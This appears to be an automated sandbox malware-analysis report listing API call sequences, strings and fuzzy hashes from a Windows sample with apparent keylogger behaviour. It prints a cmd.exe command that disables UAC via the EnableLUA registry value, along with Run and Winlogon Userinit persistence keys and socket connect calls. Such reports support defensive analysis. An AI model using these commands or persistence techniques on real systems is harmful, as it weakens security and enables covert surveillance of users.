                                                • UnhookWindowsHookEx.USER32(00000000), ref: 00405119
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@$D@2@@0@Hstd@@V?$basic_string@$?c_str@?$basic_string@HookLocalTimeUnhookV01@V10@V10@@WindowsY?$basic_string@sprintf
                                                • String ID: Offline Keylogger Stopped$[INFO]
                                                • API String ID: 2687675415-1731565019
                                                • Opcode ID: 73f78bc0082c565f9f55cf76f0ab7305f70b4147b17319cc33d2a08416430c4d
                                                • Instruction ID: 0394ba6366e7d4e37fefac95e8612def35b743fed88684bbc0dd45c3d2f07594
                                                • Opcode Fuzzy Hash: 73f78bc0082c565f9f55cf76f0ab7305f70b4147b17319cc33d2a08416430c4d
                                                • Instruction Fuzzy Hash: DD01F571A001443FEB11BFA99C858BF3BACE64135174044BEE44197241D6795E498BAA
                                                APIs
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000000), ref: 0040D7D8
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002), ref: 0040D7EA
                                                • atoi.MSVCRT(00000000), ref: 0040D7F7
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000), ref: 0040D80C
                                                • atoi.MSVCRT(00000000), ref: 0040D813
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                  • Part of subcall function 0040207B: closesocket.WS2_32(?), ref: 00402080
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@atoi$??4?$basic_string@V01@V01@@closesocket
                                                • String ID:
                                                • API String ID: 2761558587-0
                                                • Opcode ID: 72dbe61a2f8f8e5bf15a7849a2025baa77ba4c3b2ca82f2484b6bacd3a60b3db
                                                • Instruction ID: ca0c5fb672410681becd366efb38246cee844f09783bbe814c819fee062b097f
                                                • Opcode Fuzzy Hash: 72dbe61a2f8f8e5bf15a7849a2025baa77ba4c3b2ca82f2484b6bacd3a60b3db
                                                • Instruction Fuzzy Hash: 14012D32A002159BCB08EBF2EC699EE7769EB50706B00887FE502E21E1DE785944CB59
                                                APIs
                                                • RegCreateKeyW.ADVAPI32(?,80000002,80000002), ref: 0040AB23
                                                • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(0041409C,?,?,004072D5,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?,?,?,?,?,?,0041409C,00000001,00419994,00419958), ref: 0040AB32
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,004072D5,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?,?,?,?,?,?,0041409C,00000001,00419994,00419958), ref: 0040AB40
                                                • RegSetValueExW.ADVAPI32(80000002,004072D5,00000000,?,00000000,?,?,004072D5,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0040AB53
                                                • RegCloseKey.ADVAPI32(80000002,?,?,004072D5,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?,?,?,?,?,?,0041409C,00000001,00419994,00419958), ref: 0040AB5E
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,004072D5,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?,?,?,?,?,?,0041409C,00000001,00419994,00419958,00413888), ref: 0040AB6D
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,004072D5,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?,?,?,?,?,?,0041409C,00000001,00419994,00419958,00413888), ref: 0040AB7C
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: G@2@@std@@G@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@CloseCreateValue
                                                • String ID:
                                                • API String ID: 1037601705-0
                                                • Opcode ID: 434c32b60e09957411ef26353496471f8e07c9e0fd0be910f339f7ab56cc383c
                                                • Instruction ID: 7f12cbcc53fecbe87d582b8cc48c6b5378bff81d8574d99b9208886ff72aae9c
                                                • Opcode Fuzzy Hash: 434c32b60e09957411ef26353496471f8e07c9e0fd0be910f339f7ab56cc383c
                                                • Instruction Fuzzy Hash: 0201A872000119AFCF00AFA0EC598EA7B69FB1835AB018165F91A96160D7359F64DB55
                                                APIs
                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00404621), ref: 00404FC3
                                                • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00413670), ref: 00404FDC
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404FEE
                                                  • Part of subcall function 00402049: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,[INFO],?,0040C2A1,0000004B), ref: 00402058
                                                  • Part of subcall function 00402049: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040206E
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00413670,0000005A), ref: 00405003
                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040500E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@V01@@$??1?$basic_string@??4?$basic_string@??9std@@CreateD@2@@0@EventObjectSingleV01@V?$basic_string@Wait
                                                • String ID: p6A
                                                • API String ID: 2456067102-595022129
                                                • Opcode ID: 17f7f98f067e6dbc6960eb531d6f009f7b8488f1764a000bca18528244f77221
                                                • Instruction ID: 74794d95b6585517a20fa3f1f7dd6fcc89cca062171a37011fea34d96d489a2e
                                                • Opcode Fuzzy Hash: 17f7f98f067e6dbc6960eb531d6f009f7b8488f1764a000bca18528244f77221
                                                • Instruction Fuzzy Hash: 8DF0FCB55006007BD7201F34DD4CAA77B9DEB81722F40593EF412925D1CB34AD448B78
                                                APIs
                                                • RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040AA72
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(80000002,00419980,?,00407BCA,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040AA81
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,00407BCA,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040AA8B
                                                • RegSetValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,00407BCA,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040AA9E
                                                • RegCloseKey.ADVAPI32(?,?,00407BCA,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040AAA9
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00407BCA,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040AAB8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00407BCA,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040AAC7
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@?size@?$basic_string@CloseCreateValue
                                                • String ID:
                                                • API String ID: 2159132150-0
                                                • Opcode ID: b6ffc8e86b8b50b45db9268ffc76aae88d6340e7751611e2df5a130597e069ae
                                                • Instruction ID: 781ef4495a37a9729a02f807254a5a90bddac7e3fa4a8a632848f32fab2f2734
                                                • Opcode Fuzzy Hash: b6ffc8e86b8b50b45db9268ffc76aae88d6340e7751611e2df5a130597e069ae
                                                • Instruction Fuzzy Hash: 13011976100109AFCF01EF90ED598EE7B6DFF187567008175F91AA21A0DB359E24DF54
                                                APIs
                                                • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?,00419970,00419BC8), ref: 00409657
                                                • CloseHandle.KERNEL32(?), ref: 00409666
                                                • CloseHandle.KERNEL32(?), ref: 0040966B
                                                Strings
                                                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040964D
                                                • D, xrefs: 0040962E
                                                • C:\Windows\System32\cmd.exe, xrefs: 00409652
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseHandle$CreateProcess
                                                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe$D
                                                • API String ID: 2922976086-1747066916
                                                • Opcode ID: 6453cac18675bdd6e3b536317dd82f3e65e1bbe1a16b513dc0274fbf5a0cff21
                                                • Instruction ID: 7ccfb3200751489803ddb667a8eeda4a28b2d11caf851e38832d63b9906f7f84
                                                • Opcode Fuzzy Hash: 6453cac18675bdd6e3b536317dd82f3e65e1bbe1a16b513dc0274fbf5a0cff21
                                                • Instruction Fuzzy Hash: BEF0D0B2A406197EEB009AE5DC05EFFBB7DE784715F104431FA01F6160D6746D088A65
                                                APIs
                                                  • Part of subcall function 004113E6: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419970,00419BC8,00000000,00408808,)A,00000000,0000000B), ref: 004113F2
                                                  • Part of subcall function 004113E6: ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411400
                                                  • Part of subcall function 004113E6: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411422
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00411444
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411458
                                                  • Part of subcall function 004113E6: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411461
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001), ref: 0040D6BC
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000), ref: 0040D6CF
                                                • atoi.MSVCRT(00000000), ref: 0040D6D6
                                                • SetWindowTextW.USER32(00000000), ref: 0040D6DE
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D6EA
                                                  • Part of subcall function 0040E7A5: EnumWindows.USER32(Function_0000E6BB,00000000), ref: 0040E7AC
                                                  • Part of subcall function 0040E7A5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00419D70), ref: 0040E7BC
                                                  • Part of subcall function 0040E7A5: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00413670,00000063), ref: 0040E7D8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@2@@std@@G@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@$V01@@$??2@??4?$basic_string@?length@?$basic_string@EnumG@1@@TextV01@WindowWindowsatoi
                                                • String ID:
                                                • API String ID: 3096670553-0
                                                • Opcode ID: 04df1328cc08fcf5a03dd6e3d7102727e13d48a73906ad98c5c2d174954cf0ba
                                                • Instruction ID: 1abe3ad5738c4660e00d60db617f694418b70cb242a2617e4e7c05781d6bbe04
                                                • Opcode Fuzzy Hash: 04df1328cc08fcf5a03dd6e3d7102727e13d48a73906ad98c5c2d174954cf0ba
                                                • Instruction Fuzzy Hash: 40F0CD756001159BDB04BFB1ED5AAED7778FB50316F1084BAF102E20E1EE785A44CB58
                                                APIs
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411309
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411313
                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 0041131C
                                                • ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411326
                                                • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411330
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?), ref: 00411346
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 0041134F
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$D@2@@std@@D@std@@$??0?$basic_string@?begin@?$basic_string@$??1?$basic_string@?end@?$basic_string@?length@?$basic_string@G@1@@V01@@
                                                • String ID:
                                                • API String ID: 914748455-0
                                                • Opcode ID: 27e8c6a9e77f87a7722667680bfd72997ab372b83382414f82f6f9086f836895
                                                • Instruction ID: 61c2ad325da54bd1c19b5f42aaaf2902fb0afcffc7582ee81f41c22c6bee2ec4
                                                • Opcode Fuzzy Hash: 27e8c6a9e77f87a7722667680bfd72997ab372b83382414f82f6f9086f836895
                                                • Instruction Fuzzy Hash: 75F0977590020EABCB04EFA4D95D9EE7B38AF44306B008064F916A71A1DA74AB09CB69
                                                APIs
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002), ref: 0040D195
                                                • atoi.MSVCRT(00000000), ref: 0040D19C
                                                  • Part of subcall function 00411254: GetCurrentProcess.KERNEL32(?,00000000,00000001,00000002), ref: 00411267
                                                  • Part of subcall function 00411254: GetCurrentThread.KERNEL32 ref: 0041126A
                                                  • Part of subcall function 00411254: GetCurrentProcess.KERNEL32(00000000), ref: 00411271
                                                  • Part of subcall function 00411254: DuplicateHandle.KERNEL32(00000000), ref: 00411274
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D1D4
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D1EA
                                                  • Part of subcall function 004113E6: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419970,00419BC8,00000000,00408808,)A,00000000,0000000B), ref: 004113F2
                                                  • Part of subcall function 004113E6: ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411400
                                                  • Part of subcall function 004113E6: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411422
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00411444
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411458
                                                  • Part of subcall function 004113E6: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411461
                                                  • Part of subcall function 00403AC1: __EH_prolog.LIBCMT ref: 00403AC6
                                                  • Part of subcall function 00403AC1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00403AE3
                                                  • Part of subcall function 00403AC1: socket.WS2_32(00000000,00000001,00000006), ref: 00403AF6
                                                  • Part of subcall function 00403AC1: connect.WS2_32(00000000,00419298,00000010), ref: 00403B05
                                                  • Part of subcall function 00403AC1: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00419288,?,00000006), ref: 00403B2E
                                                  • Part of subcall function 00403AC1: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,00000006), ref: 00403B38
                                                  • Part of subcall function 00403AC1: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000006), ref: 00403B5E
                                                  • Part of subcall function 00403AC1: _CxxThrowException.MSVCRT(00000001,00414F18), ref: 00403B7E
                                                  • Part of subcall function 00403AC1: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000006), ref: 00403B8C
                                                  • Part of subcall function 00403AC1: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000006), ref: 00403B96
                                                  • Part of subcall function 00403AC1: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000006), ref: 00403BA0
                                                  • Part of subcall function 00403AC1: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,00413894,?), ref: 00403BC6
                                                  • Part of subcall function 00403AC1: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 00403BD0
                                                  • Part of subcall function 00403AC1: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00403BD7
                                                  • Part of subcall function 00403AC1: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00403BE6
                                                  • Part of subcall function 00403AC1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413670,?), ref: 00403C05
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$G@2@@std@@$??0?$basic_string@$??1?$basic_string@$?c_str@?$basic_string@CurrentHstd@@V01@@V?$basic_string@$?begin@?$basic_string@D@1@@D@2@@0@ProcessV10@0@$??2@?end@?$basic_string@?length@?$basic_string@DuplicateExceptionFileFindFirstG@1@@G@2@@0@H_prologHandleThreadThrowV10@atoiconnectsocket
                                                • String ID:
                                                • API String ID: 515995264-0
                                                • Opcode ID: 0c917455502c1229e80014b51a23b24372c10e94e1266ee6e90931165b098142
                                                • Instruction ID: e0e445b4bfbbbc415ef5c81fe9f50e5d85b25a9855f7445ad3f9011a8f58073a
                                                • Opcode Fuzzy Hash: 0c917455502c1229e80014b51a23b24372c10e94e1266ee6e90931165b098142
                                                • Instruction Fuzzy Hash: 06214F72A111059BDB08FBB2DC5A9FE7738EB50315F00487EF512E60E2EE385A44CB99
                                                APIs
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(80000000,00000007,00000000,00000003,00000080,00000000,00413670,?,00419BC8,00404982), ref: 004048D0
                                                • CreateFileW.KERNEL32(00000000), ref: 004048D7
                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 004048E6
                                                • Sleep.KERNEL32(00002710), ref: 00404915
                                                • CloseHandle.KERNEL32(00000000), ref: 0040491C
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404944
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
